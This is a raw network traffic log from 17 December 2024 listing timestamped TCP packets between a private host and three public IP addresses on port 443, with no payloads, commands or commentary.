Dec 17, 2024 08:38:22.146215916 CET	49709	443	192.168.2.11	104.21.48.1
Dec 17, 2024 08:38:22.150922060 CET	443	49709	104.21.48.1	192.168.2.11
Dec 17, 2024 08:38:22.151009083 CET	49709	443	192.168.2.11	104.21.48.1
Dec 17, 2024 08:38:22.155328035 CET	443	49709	104.21.48.1	192.168.2.11
Dec 17, 2024 08:38:22.155421972 CET	49709	443	192.168.2.11	104.21.48.1
Dec 17, 2024 08:38:22.159562111 CET	443	49709	104.21.48.1	192.168.2.11
Dec 17, 2024 08:38:22.161751032 CET	443	49709	104.21.48.1	192.168.2.11
Dec 17, 2024 08:38:22.161776066 CET	49709	443	192.168.2.11	104.21.48.1
Dec 17, 2024 08:38:22.161782980 CET	443	49709	104.21.48.1	192.168.2.11
Dec 17, 2024 08:38:22.161863089 CET	49709	443	192.168.2.11	104.21.48.1
Dec 17, 2024 08:38:22.161863089 CET	49709	443	192.168.2.11	104.21.48.1
Dec 17, 2024 08:38:22.173141956 CET	443	49709	104.21.48.1	192.168.2.11
Dec 17, 2024 08:38:22.173160076 CET	443	49709	104.21.48.1	192.168.2.11
Dec 17, 2024 08:38:22.173176050 CET	443	49709	104.21.48.1	192.168.2.11
Dec 17, 2024 08:38:22.173258066 CET	49709	443	192.168.2.11	104.21.48.1
Dec 17, 2024 08:38:22.173258066 CET	49709	443	192.168.2.11	104.21.48.1
Dec 17, 2024 08:38:22.173264027 CET	443	49709	104.21.48.1	192.168.2.11
Dec 17, 2024 08:38:22.173299074 CET	49709	443	192.168.2.11	104.21.48.1
Dec 17, 2024 08:38:22.186080933 CET	443	49709	104.21.48.1	192.168.2.11
Dec 17, 2024 08:38:22.186111927 CET	443	49709	104.21.48.1	192.168.2.11
Dec 17, 2024 08:38:22.186182976 CET	49709	443	192.168.2.11	104.21.48.1
Dec 17, 2024 08:38:22.186187983 CET	443	49709	104.21.48.1	192.168.2.11
Dec 17, 2024 08:38:22.186217070 CET	49709	443	192.168.2.11	104.21.48.1
Dec 17, 2024 08:38:22.186830997 CET	49709	443	192.168.2.11	104.21.48.1
Dec 17, 2024 08:38:22.199198961 CET	443	49709	104.21.48.1	192.168.2.11
Dec 17, 2024 08:38:22.199229002 CET	443	49709	104.21.48.1	192.168.2.11
Dec 17, 2024 08:38:22.199280977 CET	49709	443	192.168.2.11	104.21.48.1
Dec 17, 2024 08:38:22.199286938 CET	443	49709	104.21.48.1	192.168.2.11
Dec 17, 2024 08:38:22.199345112 CET	49709	443	192.168.2.11	104.21.48.1
Dec 17, 2024 08:38:22.213179111 CET	443	49709	104.21.48.1	192.168.2.11
Dec 17, 2024 08:38:22.213207960 CET	443	49709	104.21.48.1	192.168.2.11
Dec 17, 2024 08:38:22.213596106 CET	49709	443	192.168.2.11	104.21.48.1
Dec 17, 2024 08:38:22.213604927 CET	443	49709	104.21.48.1	192.168.2.11
Dec 17, 2024 08:38:22.213644981 CET	49709	443	192.168.2.11	104.21.48.1
Dec 17, 2024 08:38:22.225310087 CET	443	49709	104.21.48.1	192.168.2.11
Dec 17, 2024 08:38:22.225334883 CET	443	49709	104.21.48.1	192.168.2.11
Dec 17, 2024 08:38:22.225400925 CET	49709	443	192.168.2.11	104.21.48.1
Dec 17, 2024 08:38:22.225404978 CET	443	49709	104.21.48.1	192.168.2.11
Dec 17, 2024 08:38:22.225455046 CET	49709	443	192.168.2.11	104.21.48.1
Dec 17, 2024 08:38:22.239504099 CET	443	49709	104.21.48.1	192.168.2.11
Dec 17, 2024 08:38:22.239532948 CET	443	49709	104.21.48.1	192.168.2.11
Dec 17, 2024 08:38:22.239604950 CET	49709	443	192.168.2.11	104.21.48.1
Dec 17, 2024 08:38:22.239609957 CET	443	49709	104.21.48.1	192.168.2.11
Dec 17, 2024 08:38:22.239634991 CET	49709	443	192.168.2.11	104.21.48.1
Dec 17, 2024 08:38:22.239660978 CET	49709	443	192.168.2.11	104.21.48.1
Dec 17, 2024 08:38:22.332751989 CET	443	49709	104.21.48.1	192.168.2.11
Dec 17, 2024 08:38:22.332779884 CET	443	49709	104.21.48.1	192.168.2.11
Dec 17, 2024 08:38:22.332842112 CET	49709	443	192.168.2.11	104.21.48.1
Dec 17, 2024 08:38:22.332849979 CET	443	49709	104.21.48.1	192.168.2.11
Dec 17, 2024 08:38:22.332871914 CET	49709	443	192.168.2.11	104.21.48.1
Dec 17, 2024 08:38:22.332906008 CET	49709	443	192.168.2.11	104.21.48.1
Dec 17, 2024 08:38:22.343242884 CET	443	49709	104.21.48.1	192.168.2.11
Dec 17, 2024 08:38:22.343262911 CET	443	49709	104.21.48.1	192.168.2.11
Dec 17, 2024 08:38:22.343341112 CET	49709	443	192.168.2.11	104.21.48.1
Dec 17, 2024 08:38:22.343348980 CET	443	49709	104.21.48.1	192.168.2.11
Dec 17, 2024 08:38:22.343359947 CET	49709	443	192.168.2.11	104.21.48.1
Dec 17, 2024 08:38:22.343393087 CET	49709	443	192.168.2.11	104.21.48.1
Dec 17, 2024 08:38:22.348890066 CET	443	49709	104.21.48.1	192.168.2.11
Dec 17, 2024 08:38:22.348975897 CET	443	49709	104.21.48.1	192.168.2.11
Dec 17, 2024 08:38:22.349001884 CET	49709	443	192.168.2.11	104.21.48.1
Dec 17, 2024 08:38:22.349024057 CET	49709	443	192.168.2.11	104.21.48.1
Dec 17, 2024 08:38:22.349294901 CET	49709	443	192.168.2.11	104.21.48.1
Dec 17, 2024 08:38:22.349306107 CET	443	49709	104.21.48.1	192.168.2.11
Dec 17, 2024 08:38:24.296586990 CET	49723	443	192.168.2.11	83.166.133.91
Dec 17, 2024 08:38:24.296632051 CET	443	49723	83.166.133.91	192.168.2.11
Dec 17, 2024 08:38:24.296708107 CET	49723	443	192.168.2.11	83.166.133.91
Dec 17, 2024 08:38:24.306996107 CET	49723	443	192.168.2.11	83.166.133.91
Dec 17, 2024 08:38:24.307008028 CET	443	49723	83.166.133.91	192.168.2.11
Dec 17, 2024 08:38:25.484083891 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:25.484189034 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:25.484272003 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:25.491578102 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:25.491624117 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:25.726416111 CET	443	49723	83.166.133.91	192.168.2.11
Dec 17, 2024 08:38:25.726519108 CET	49723	443	192.168.2.11	83.166.133.91
Dec 17, 2024 08:38:25.728621006 CET	49723	443	192.168.2.11	83.166.133.91
Dec 17, 2024 08:38:25.728641033 CET	443	49723	83.166.133.91	192.168.2.11
Dec 17, 2024 08:38:25.728913069 CET	443	49723	83.166.133.91	192.168.2.11
Dec 17, 2024 08:38:25.735832930 CET	49723	443	192.168.2.11	83.166.133.91
Dec 17, 2024 08:38:25.783328056 CET	443	49723	83.166.133.91	192.168.2.11
Dec 17, 2024 08:38:26.365403891 CET	443	49723	83.166.133.91	192.168.2.11
Dec 17, 2024 08:38:26.365444899 CET	443	49723	83.166.133.91	192.168.2.11
Dec 17, 2024 08:38:26.365485907 CET	443	49723	83.166.133.91	192.168.2.11
Dec 17, 2024 08:38:26.365525007 CET	49723	443	192.168.2.11	83.166.133.91
Dec 17, 2024 08:38:26.365550041 CET	443	49723	83.166.133.91	192.168.2.11
Dec 17, 2024 08:38:26.365567923 CET	49723	443	192.168.2.11	83.166.133.91
Dec 17, 2024 08:38:26.365595102 CET	49723	443	192.168.2.11	83.166.133.91
Dec 17, 2024 08:38:26.487795115 CET	443	49723	83.166.133.91	192.168.2.11
Dec 17, 2024 08:38:26.487828970 CET	443	49723	83.166.133.91	192.168.2.11
Dec 17, 2024 08:38:26.487898111 CET	49723	443	192.168.2.11	83.166.133.91
Dec 17, 2024 08:38:26.487926006 CET	443	49723	83.166.133.91	192.168.2.11
Dec 17, 2024 08:38:26.487958908 CET	49723	443	192.168.2.11	83.166.133.91
Dec 17, 2024 08:38:26.488003969 CET	49723	443	192.168.2.11	83.166.133.91
Dec 17, 2024 08:38:26.556865931 CET	443	49723	83.166.133.91	192.168.2.11
Dec 17, 2024 08:38:26.556905985 CET	443	49723	83.166.133.91	192.168.2.11
Dec 17, 2024 08:38:26.557012081 CET	49723	443	192.168.2.11	83.166.133.91
Dec 17, 2024 08:38:26.557041883 CET	443	49723	83.166.133.91	192.168.2.11
Dec 17, 2024 08:38:26.557068110 CET	49723	443	192.168.2.11	83.166.133.91
Dec 17, 2024 08:38:26.557085991 CET	49723	443	192.168.2.11	83.166.133.91
Dec 17, 2024 08:38:26.657016039 CET	443	49723	83.166.133.91	192.168.2.11
Dec 17, 2024 08:38:26.657121897 CET	49723	443	192.168.2.11	83.166.133.91
Dec 17, 2024 08:38:26.657154083 CET	443	49723	83.166.133.91	192.168.2.11
Dec 17, 2024 08:38:26.657187939 CET	443	49723	83.166.133.91	192.168.2.11
Dec 17, 2024 08:38:26.657224894 CET	49723	443	192.168.2.11	83.166.133.91
Dec 17, 2024 08:38:26.657243967 CET	49723	443	192.168.2.11	83.166.133.91
Dec 17, 2024 08:38:26.708055973 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:26.708185911 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:26.712536097 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:26.712559938 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:26.712925911 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:26.720252037 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:26.767338991 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:26.838912964 CET	49723	443	192.168.2.11	83.166.133.91
Dec 17, 2024 08:38:27.378978968 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:27.379848003 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:27.379878044 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:27.379904032 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:27.379940987 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:27.380218983 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:27.380230904 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:27.387994051 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:27.388111115 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:27.388144970 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:27.398497105 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:27.398710966 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:27.398749113 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:27.441193104 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:27.498581886 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:27.502688885 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:27.502746105 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:27.502778053 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:27.550568104 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:27.571535110 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:27.581926107 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:27.581963062 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:27.582014084 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:27.582046032 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:27.582201004 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:27.590078115 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:27.590142012 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:27.590228081 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:27.590260983 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:27.606350899 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:27.606461048 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:27.606472969 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:27.606487989 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:27.606532097 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:27.614484072 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:27.622932911 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:27.622981071 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:27.622999907 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:27.623032093 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:27.623079062 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:27.630980015 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:27.638940096 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:27.642282009 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:27.642323017 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:27.645447969 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:27.645544052 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:27.645574093 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:27.651376963 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:27.651412010 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:27.651523113 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:27.651554108 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:27.653656006 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:27.657592058 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:27.706820965 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:27.717804909 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:27.763552904 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:27.763631105 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:27.763663054 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:27.766637087 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:27.766693115 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:27.766719103 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:27.776350021 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:27.776365995 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:27.776427031 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:27.776453018 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:27.776468039 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:27.785160065 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:27.785223961 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:27.785252094 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:27.785300970 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:27.793864965 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:27.793883085 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:27.793920994 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:27.802499056 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:27.802514076 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:27.802598000 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:27.802628994 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:27.811191082 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:27.811255932 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:27.811281919 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:27.811327934 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:27.815545082 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:27.815558910 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:27.815625906 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:27.824177980 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:27.824194908 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:27.824254036 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:27.832789898 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:27.832863092 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:27.837251902 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:27.837318897 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:27.845896959 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:27.845985889 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:27.852402925 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:27.852493048 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:27.856630087 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:27.856684923 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:27.865344048 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:27.865437031 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:27.865444899 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:27.865477085 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:27.865516901 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:27.955619097 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:27.955812931 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:27.957071066 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:27.957139969 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:27.962865114 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:27.962954044 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:27.969229937 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:27.969326019 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:27.972364902 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:27.972441912 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:27.978246927 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:27.978334904 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:27.982572079 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:27.982631922 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:27.984633923 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:27.984680891 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:27.988756895 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:27.988816023 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:27.992753983 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:27.992803097 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:27.994772911 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:27.994826078 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:27.996862888 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:27.996916056 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:28.000906944 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:28.000987053 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:28.001008034 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:28.004862070 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:28.004919052 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:28.004936934 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:28.005057096 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:28.007946014 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:28.007993937 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:28.010021925 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:28.010097980 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:28.014111996 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:28.014200926 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:28.018054962 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:28.018119097 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:28.022067070 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:28.022135973 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:28.024475098 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:28.024557114 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:28.030615091 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:28.030730009 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:28.032712936 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:28.032774925 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:28.075300932 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:28.075373888 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:28.078262091 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:28.078372002 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:28.147707939 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:28.147725105 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:28.147758007 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:28.147794962 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:28.147825956 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:28.147850990 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:28.147877932 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:28.151792049 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:28.151859045 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:28.158421040 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:28.158484936 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:28.158498049 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:28.158538103 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:28.163387060 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:28.163490057 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:28.163499117 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:28.163537979 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:28.171837091 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:28.171859026 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:28.171901941 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:28.171916008 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:28.171951056 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:28.175398111 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:28.175456047 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:28.175467968 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:28.175600052 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:28.183902025 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:28.183934927 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:28.184017897 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:28.184029102 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:28.184070110 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:28.191792011 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:28.191817999 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:28.191858053 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:28.191869020 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:28.191894054 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:28.191915989 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:28.192991018 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:28.193058014 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:28.201400995 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:28.201426029 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:28.201481104 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:28.201556921 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:28.201622963 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:28.204699993 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:28.204761982 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:28.204782009 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:28.204827070 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:28.339679956 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:28.339710951 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:28.339755058 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:28.339783907 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:28.339801073 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:28.339817047 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:28.345035076 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:28.345053911 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:28.345113993 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:28.345123053 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:28.345161915 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:28.348656893 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:28.348733902 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:28.348740101 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:28.348783016 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:28.352518082 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:28.352596045 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:28.352617979 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:28.352626085 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:28.352744102 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:28.358189106 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:28.358207941 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:28.358242989 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:28.358258963 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:28.358302116 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:28.359811068 CET	443	49729	188.114.97.6	192.168.2.11
